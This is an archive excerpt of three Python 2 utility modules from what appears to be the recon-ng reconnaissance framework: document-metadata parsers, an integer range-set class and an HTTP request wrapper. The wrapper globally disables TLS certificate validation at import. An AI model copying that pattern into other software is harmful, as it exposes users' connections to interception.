LaNMaSteR53-recon-ng-70d967e3f530/recon/utils/parsers.py000066400000000000000000000027601312265724400224600ustar00rootroot00000000000000from PyPDF2 import PdfFileReader from PyPDF2.utils import PdfReadError from StringIO import StringIO from urlparse import urlparse import lxml.etree import olefile import os import re import zipfile def parse_hostname(s): host = urlparse(s) if not host.scheme: host = urlparse('//'+s) return host.netloc def parse_emails(s): return re.findall(r'([^\s]+@[^\s]+)', s) def ole_parser(s): ole = olefile.OleFileIO(s) meta = ole.get_metadata() attrs = meta.DOCSUM_ATTRIBS + meta.SUMMARY_ATTRIBS #meta.dump() result = {} for attr in attrs: if hasattr(meta, attr): result[attr] = getattr(meta, attr) ole.close() return result def ooxml_parser(s): zf = zipfile.ZipFile(StringIO(s)) doc = lxml.etree.fromstring(zf.read('docProps/core.xml')) meta = [(x.tag, x.text) for x in doc.xpath('/*/*', namespaces=doc.nsmap)] #print(lxml.etree.tostring(doc, pretty_print=True)) result = {} for el in meta: result[el[0].split('}')[-1]] = el[1] return result def pdf_parser(s): s = s.strip() # required to suppress warning messages with open(os.devnull, 'w') as fp: pdf = PdfFileReader(StringIO(s), strict=False, warndest=fp) if pdf.isEncrypted: try: pdf.decrypt('') except NotImplementedError: return {} meta = pdf.getDocumentInfo() #print(str(meta)) result = {} for key in meta.keys(): result[key[1:]] = meta.get(key) return result LaNMaSteR53-recon-ng-70d967e3f530/recon/utils/ranges.py000066400000000000000000000104451312265724400222570ustar00rootroot00000000000000# # Sets of ranges of (integer) numbers. class Ranges: """Represent a set of integer ranges. Ranges represent a set of ranges of numbers. A new range or a list of them may be added to or deleted from the set. Adjacent ranges are merged in the set to create the minimal set of ranges necessary to cover all included numbers. Range sets support addition and subtraction operations. Eg: Ranges(1,10) + Ranges(2,30) + Ranges(50,60) - Ranges(14,28)""" def __init__(self, start=None, end=None): """Optional START,END arguments become the initial range.""" self._l = [] if start and end: self._l.append([start,end]) def dump(self): """Returns the current content of the ranges.""" return self._l def _find(self, start): i = 0 while i < len(self._l): if start <= self._l[i][0]: break i = i + 1 return i def _isprev(self, i): return not (i == 0) def _prev(self,i): return self._l[i-1] def add(self, start, end): """And a range from START to END to the set.""" # we store ranges sorted by start. find where it should go. i = self._find(start) # too large to fit: if i == len(self._l): self._l.append([start, end]) else: r = self._l[i] # does it fit entirely inside an existing one? if start >= r[0] and end <= r[1]: return # glue it in in order; right now, ordered by start. self._l.insert(i, [start, end]) # now we fix up the list by merging adjacent or overlapping # entries. We start from where we inserted, or 1 if we # inserted at 0, so we always have a previous entry. # if the list is length 1, this loop will do nothing. i = max(i, 1) while i < len(self._l): # attempt to merge with previous entry ro = self._l[i-1] r = self._l[i] # if front is adjacent or inside their back, we # are either inside them, or we are merging. if r[0]-1 <= ro[1]: # we must use max(), because we may be inside # them. ro[1] = max(r[1], ro[1]) del self._l[i] elif r[0] == start and r[1] == end: # if we are currently looking at ourselves, # we need to look one afterwards too, in case # we are merging *up*. (I am not entirely sure # that this logic is still correct. See del.) i = i + 1 else: # if we have done no work now, we will never # do any more. break def remove(self, start, end): """Remove the range START to END from the set.""" i = self._find(start) # deal with the previous block. # the previous block axiomatically has something in it after # we're done, because it starts before the range. if self._isprev(i) and start <= self._prev(i)[1]: r = self._prev(i) oe = r[1] # this is always correct: r[1] = start-1 # however, we may need to split it. if end < oe: self._l.insert(i, [end+1, oe]) # we may need to delete forward: while i < len(self._l): r = self._l[i] if r[0] > end: break # the range may be entirely contained in what we're # removing, or it may be only partially included. if r[1] <= end: del self._l[i] else: r[0] = end+1 def isin(self, val): """Is VAL a point in the set of ranges?""" for r in self._l: if val >= r[0] and val <= r[1]: return 1 return None # we could attempt to define arithmetic operations on ranges, # but I think it would come to a horrible end due to stuff, and # it would involve a lot of copying. def addl(self, l): """Add a list of [start,end] ranges to the set.""" for s,e in l: self.add(s, e) def removel(self, l): """Remove a list of [start,end] ranges from the set.""" for s,e in l: self.remove(s, e) # on the other hand, what's copying in python? def _clone(self): n = self.__class__() for s,e in self._l: n._l.append([s,e]) return n def __add__(self, other): n = self._clone() for s,e in other._l: n.add(s,e) return n def __sub__(self, other): n = self._clone() for s,e in other._l: n.remove(s,e) return n def __eq__(self, other): if len(other._l) != len(self._l): return 0 for i in xrange(0, len(self._l)): if self._l[i] != other._l[i]: return 0 return 1 # okay, just what *is* the length of a range? # in this case it is the number of distinct subranges it has. def __len__(self): return len(self._l) def __cmp__(self, other): if self.__eq__(other): return 0 # invalid to use except as ==, so I don't CARE. return 1 LaNMaSteR53-recon-ng-70d967e3f530/recon/utils/requests.py000066400000000000000000000125551312265724400226570ustar00rootroot00000000000000import json import socket import ssl import urllib import urllib2 # create a global ssl context that ignores certificate validation if hasattr(ssl, '_create_unverified_context'): ssl._create_default_https_context = ssl._create_unverified_context def encode_payload(in_dict): out_dict = {} for k, v in in_dict.iteritems(): if isinstance(v, unicode): v = v.encode('utf8') elif isinstance(v, str): # must be encoded in UTF-8 v.decode('utf8') out_dict[k] = v return out_dict class Request(object): def __init__(self, **kwargs): '''Initializes control parameters as class attributes.''' self.user_agent = "Python-urllib/%s" % (urllib2.__version__) if 'user_agent' not in kwargs else kwargs['user_agent'] self.debug = False if 'debug' not in kwargs else kwargs['debug'] self.proxy = None if 'proxy' not in kwargs else kwargs['proxy'] self.timeout = None if 'timeout' not in kwargs else kwargs['timeout'] self.redirect = True if 'redirect' not in kwargs else kwargs['redirect'] def send(self, url, method='GET', payload=None, headers=None, cookiejar=None, auth=None, content=''): '''Makes a web request and returns a response object.''' if method.upper() != 'POST' and content: raise RequestException('Invalid content type for the %s method: %s' % (method, content)) # prime local mutable variables to prevent persistence if payload is None: payload = {} if headers is None: headers = {} if auth is None: auth = () # set request arguments # process user-agent header headers['User-Agent'] = self.user_agent # process payload if content.upper() == 'JSON': headers['Content-Type'] = 'application/json' payload = json.dumps(payload) else: payload = urllib.urlencode(encode_payload(payload)) # process basic authentication if len(auth) == 2: authorization = ('%s:%s' % (auth[0], auth[1])).encode('base64').replace('\n', '') headers['Authorization'] = 'Basic %s' % (authorization) # process socket timeout if self.timeout: socket.setdefaulttimeout(self.timeout) # set handlers # declare handlers list according to debug setting handlers = [urllib2.HTTPHandler(debuglevel=1), urllib2.HTTPSHandler(debuglevel=1)] if self.debug else [] # process cookiejar handler if cookiejar != None: handlers.append(urllib2.HTTPCookieProcessor(cookiejar)) # process redirect and add handler if self.redirect == False: handlers.append(NoRedirectHandler) # process proxies and add handler if self.proxy: proxies = {'http': self.proxy, 'https': self.proxy} handlers.append(urllib2.ProxyHandler(proxies)) # install opener opener = urllib2.build_opener(*handlers) urllib2.install_opener(opener) # process method and make request if method == 'GET': if payload: url = '%s?%s' % (url, payload) req = urllib2.Request(url, headers=headers) elif method == 'POST': req = urllib2.Request(url, data=payload, headers=headers) elif method == 'HEAD': if payload: url = '%s?%s' % (url, payload) req = urllib2.Request(url, headers=headers) req.get_method = lambda : 'HEAD' else: raise RequestException('Request method \'%s\' is not a supported method.' % (method)) try: resp = urllib2.urlopen(req) except urllib2.HTTPError as e: resp = e # build and return response object return ResponseObject(resp, cookiejar) class NoRedirectHandler(urllib2.HTTPRedirectHandler): def http_error_302(self, req, fp, code, msg, headers): pass http_error_301 = http_error_303 = http_error_307 = http_error_302 import gzip import StringIO import xml.etree.ElementTree class ResponseObject(object): def __init__(self, resp, cookiejar): # set raw response property self.raw = resp.read() # set inherited properties self.url = resp.geturl() self.status_code = resp.getcode() self.headers = resp.headers.dict # detect and set encoding property self.encoding = resp.headers.getparam('charset') self.content_type = resp.headers.getheader('content-type') self.cookiejar = cookiejar # deflate payload if needed if resp.headers.getheader('content-encoding') == 'gzip': self.deflate() def deflate(self): with gzip.GzipFile(fileobj=StringIO.StringIO(self.raw)) as gz: self.raw = gz.read() @property def text(self): try: return self.raw.decode(self.encoding) except (UnicodeDecodeError, TypeError): return ''.join([char for char in self.raw if ord(char) in [9,10,13] + range(32, 126)]) @property def json(self): try: return json.loads(self.text) except ValueError: return None @property def xml(self): try: return xml.etree.ElementTree.parse(StringIO.StringIO(self.text)) except xml.etree.ElementTree.ParseError: return None class RequestException(Exception): pass